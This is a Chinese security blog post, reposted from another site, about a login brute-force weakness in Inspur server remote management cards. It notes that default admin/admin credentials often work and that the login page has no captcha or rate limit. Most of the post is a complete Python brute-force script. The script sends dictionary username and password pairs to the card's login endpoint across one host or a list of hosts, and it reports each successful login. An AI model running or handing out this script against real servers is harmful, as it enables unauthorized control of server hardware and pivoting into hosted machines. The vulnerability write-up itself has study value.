浪潮远控卡登录爆破漏洞(附爆破脚本)

  • 内容
  • 相关

浪潮远控卡是一款插在服务器上的,方便运维人员和服务器管理人员对服务器进行远程控制的WEB服务,其在80端口对外提供HTTP服务。登录进去以后可以对服务器硬件进行远程控制和管理。例如CPU、内存等性能指标监控,远程开启关闭服务器上的虚拟机,甚至作为控制虚拟主机的跳板机。

1.png

爆破成功

2.png

浪潮远控卡可以尝试使用admin/admin进行登录尝试,很有可能可以进去。另外浪潮远控卡登录没有验证码,没有频率测试限制,可以轻松使用burpsuite进行登录爆破尝试。

3.png

4.png

下面是某位大大的脚本

#!/usr/bin/env python
# -*- coding:utf-8 -*-

#import lib files
import os
import sys
import logging
import requests
from optparse import OptionParser

#global configuration set
reload(sys)
sys.setdefaultencoding("utf-8")
logging.basicConfig(format='%(asctime)s-%(message)s',datefmt='%Y-%m-%d %H:%M:%S %p',level=logging.INFO)

#global varites defines
HEADER = {
    "User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:57.0) Gecko/20100101 Firefox/57.0",
    "Accept":"application/json, text/plain, */*",
    "Accept-Language":"zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
    "Accept-Encoding":"gzip, deflate",
    "Content-Type":"application/json;charset=utf-8"
}
SUCCESS_FLAG = "SESSION_COOKIE"
USERNAME_LIST = ["admin"]
PASSWORD_LIST = ["admin"]

#global functions defines
def config_read_from_file(userfile,pswdfile):
    global USERNAME_LIST
    global PASSWORD_LIST
    logging.info("[+] Read Configuration From File ...")
    try:
        with open(userfile,"r") as fr:
            for line in fr.readlines():
                line = line.split("\n")[0].split("\r")[0]
                USERNAME_LIST.append(line)
    except Exception,ex:
        logstr = "[-] Configuration Read From File Failed! Reason:%s"%str(ex)
        logging.error(logstr)
        logging.info("[+] Use Default Dict!")
    try:
        with open(pswdfile,"r") as fr:
            for line in fr.readlines():
                line = line.split("\n")[0].split("\r")[0]
                PASSWORD_LIST.append(line)
    except Exception,ex:
        logstr = "[-] Configuration Read From File Failed! Reason:%s"%str(ex)
        logging.error(logstr)
        logging.info("[+] Use Default Dict!")
    return 0

def login_packet_send(target,username,password):
    login_data = {"WEBVAR_USERNAME":username,"WEBVAR_PASSWORD":password}
    try:
        response = requests.post("http://%s/rpc/WEBSES/create.asp"%str(target),headers=HEADER,data=login_data,timeout=5)
    except Exception,ex:
        logstr = "[-] Connect Failed Reason:%s"%str(ex)
        logging.error(logstr)
        return -1
    if response.status_code != 200:
        return -1
    else:
        return response.content

def vuln_check(content):
    if content.find(SUCCESS_FLAG) >= 0 and content.find("Failure_Login_IPMI_Then_LDAP_then_Active_Directory_Radius") < 0:
        return 0
    else:
        return -1

def crack(target,username,password):
    content = login_packet_send(target,username,password)
    if content != -1:
        if vuln_check(content) == 0:
            logging.info("[*] Crack %s Success! Username:%s,Password:%s"%(str(target),str(username),str(password)))
            return 0
    return -1

def scan(target,targettype):
    targetlist = []
    if targettype == 1:
        try:
            with open(target,"r") as fr:
                for line in fr.readlines():
                    line = line.split("\n")[0].split("\r")[0].replace(" ","")
                    targetlist.append(line)
        except Exception,ex:
            pass
    else:
        targetlist = [target]
    if len(target) > 0:
        for item in targetlist:
            for user in USERNAME_LIST:
                for pswd in PASSWORD_LIST:
                    crack(item,user,pswd)

#main function -- programme
if __name__ == "__main__": 
    parser = OptionParser()
    parser.add_option("-t", "--target", dest="target",help="target to check")
    parser.add_option("-f", "--filename", dest="targetfile",help="targetfiel to check")
    parser.add_option("-u", "--userfile", dest="userfile",help="username dict")
    parser.add_option("-p", "--pswdfile", dest="pswdfile",help="password dict")
    (options, args) = parser.parse_args()
    config_read_from_file(options.userfile,options.pswdfile)
    if options.target not in ["",None," "]:
        scan(options.target,0)
    elif options.targetfile not in ["",None," "]:
        scan(options.targetfile,1)
原文:http://www.cnblogs.com/KevinGeorge/p/8358456.html

本文标签:

版权声明:若无特殊注明,本文皆为《颓废》原创,转载请保留文章出处。

收录状态:[百度已收录] | [360已收录] | [搜狗已收录]

本文链接:浪潮远控卡登录爆破漏洞(附爆破脚本) - https://www.0dayhack.com/post-793.html

严重声明:本站内容来自于互联网,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规,黑客不是骇客,黑客维护网络安全

发表评论

电子邮件地址不会被公开。 必填项已用*标注

评论

1条评论
  1. avatar

    thebestuseroftheworl Lv.1 Firefox 52.0 Firefox 52.0 GNU/Linux x64 GNU/Linux x64 回复

    感谢您的信息

    美国 得克萨斯州